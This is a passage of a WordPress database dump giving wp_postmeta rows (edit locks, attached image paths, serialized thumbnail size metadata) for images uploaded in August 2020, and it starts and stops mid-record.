camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25422, 10330, '_thumbnail_id', '10331'),
(25425, 10330, '_hide_featured', NULL),
(25428, 10333, '_edit_lock', '1597287830:14'),
(25429, 10333, '_edit_last', '14'),
(25430, 10334, '_wp_attached_file', '2020/08/13086305.jpg'),
(25431, 10334, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086305.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086305-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086305-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086305-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086305-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086305-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25432, 10333, '_thumbnail_id', '10334'),
(25435, 10333, '_hide_featured', NULL),
(25438, 10336, '_edit_lock', '1597287974:14'),
(25439, 10336, '_edit_last', '14'),
(25440, 10337, '_wp_attached_file', '2020/08/13086306.jpg'),
(25441, 10337, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086306.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086306-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086306-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086306-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086306-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086306-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25442, 10336, '_thumbnail_id', '10337'),
(25445, 10336, '_hide_featured', NULL),
(25448, 10339, '_edit_lock', '1597288097:14'),
(25449, 10339, '_edit_last', '14'),
(25450, 10340, '_wp_attached_file', '2020/08/13086307.jpg'),
(25451, 10340, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086307.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086307-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086307-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086307-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086307-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086307-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25452, 10339, '_thumbnail_id', '10340'),
(25455, 10339, '_hide_featured', NULL),
(25458, 10342, '_edit_lock', '1597288294:14'),
(25459, 10342, '_edit_last', '14'),
(25460, 10343, '_wp_attached_file', '2020/08/13086308.jpg'),
(25461, 10343, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086308.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086308-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086308-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086308-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086308-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086308-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25462, 10342, '_thumbnail_id', '10343'),
(25465, 10342, '_hide_featured', NULL),
(25468, 10345, '_edit_lock', '1597288351:14'),
(25469, 10345, '_edit_last', '14'),
(25470, 10346, '_wp_attached_file', '2020/08/13086309.jpg'),
(25471, 10346, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086309.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086309-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086309-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086309-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086309-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086309-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25472, 10345, '_thumbnail_id', '10346'),
(25475, 10345, '_hide_featured', NULL),
(25478, 10348, '_edit_lock', '1597288585:14'),
(25479, 10348, '_edit_last', '14'),
(25480, 10349, '_wp_attached_file', '2020/08/13086310.jpg'),
(25481, 10349, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/13086310.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086310-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086310-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086310-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25482, 10348, '_thumbnail_id', '10349'),
(25485, 10348, '_hide_featured', NULL),
(25490, 10352, '_edit_lock', '1597288688:14'),
(25491, 10352, '_edit_last', '14'),
(25492, 10353, '_wp_attached_file', '2020/08/13086311.jpg'),
(25493, 10353, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086311.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086311-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086311-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086311-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086311-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086311-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25494, 10352, '_thumbnail_id', '10353'),
(25497, 10352, '_hide_featured', NULL),
(25500, 10355, '_edit_lock', '1597288740:14'),
(25501, 10355, '_edit_last', '14'),
(25502, 10356, '_wp_attached_file', '2020/08/13086312.jpg'),
(25503, 10356, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086312.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086312-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086312-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086312-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086312-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086312-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25504, 10355, '_thumbnail_id', '10356'),
(25507, 10355, '_hide_featured', NULL),
(25510, 10358, '_edit_lock', '1597288892:14'),
(25511, 10358, '_edit_last', '14'),
(25512, 10359, '_wp_attached_file', '2020/08/13086313.jpg'),
(25513, 10359, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086313.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086313-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086313-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086313-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086313-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086313-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25514, 10358, '_thumbnail_id', '10359'),
(25517, 10358, '_hide_featured', NULL),
(25520, 10361, '_edit_lock', '1597288976:14'),
(25521, 10361, '_edit_last', '14'),
(25522, 10362, '_wp_attached_file', '2020/08/13086314.jpg'),
(25523, 10362, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/13086314.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086314-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086314-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086314-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25524, 10361, '_thumbnail_id', '10362'),
(25527, 10361, '_hide_featured', NULL),
(25530, 10364, '_edit_lock', '1597289139:14'),
(25531, 10364, '_edit_last', '14'),
(25532, 10365, '_wp_attached_file', '2020/08/13086315.jpg'),
(25533, 10365, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086315.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086315-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086315-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086315-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086315-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086315-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25534, 10364, '_thumbnail_id', '10365'),
(25537, 10364, '_hide_featured', NULL),
(25540, 10367, '_edit_lock', '1597289235:14'),
(25541, 10367, '_edit_last', '14'),
(25542, 10368, '_wp_attached_file', '2020/08/13086316.jpg'),
(25543, 10368, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086316.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086316-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086316-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086316-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086316-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086316-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25544, 10367, '_thumbnail_id', '10368'),
(25547, 10367, '_hide_featured', NULL),
(25548, 10370, '_edit_lock', '1597289402:14'),
(25549, 10370, '_edit_last', '14'),
(25550, 10371, '_wp_attached_file', '2020/08/13086317.jpg'),
(25551, 10371, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086317.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086317-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086317-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086317-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086317-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086317-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(25552, 10370, '_thumbnail_id', '10371'),
(25555, 10370, '_hide_featured', NULL),
(25558, 10373, '_edit_lock', '1597289530:14'),
(25559, 10373, '_edit_last', '14'),
(25560, 10374, '_wp_attached_file', '2020/08/13086318.jpg'),
(25561, 10374, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/13086318.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086318-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086318-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086318-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"13086318-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086318-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25562, 10373, '_thumbnail_id', '10374'),
(25565, 10373, '_hide_featured', NULL),
(25568, 10376, '_edit_lock', '1597289625:14'),
(25569, 10376, '_edit_last', '14'),
(25570, 10377, '_wp_attached_file', '2020/08/13086319.jpg'),
(25571, 10377, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/13086319.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086319-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086319-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086319-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086319-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25572, 10376, '_thumbnail_id', '10377'),
(25575, 10376, '_hide_featured', NULL),
(25578, 10380, '_edit_lock', '1597289703:14'),
(25579, 10380, '_edit_last', '14'),
(25580, 10381, '_wp_attached_file', '2020/08/13086320.jpg'),
(25581, 10381, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/13086320.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086320-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086320-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086320-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"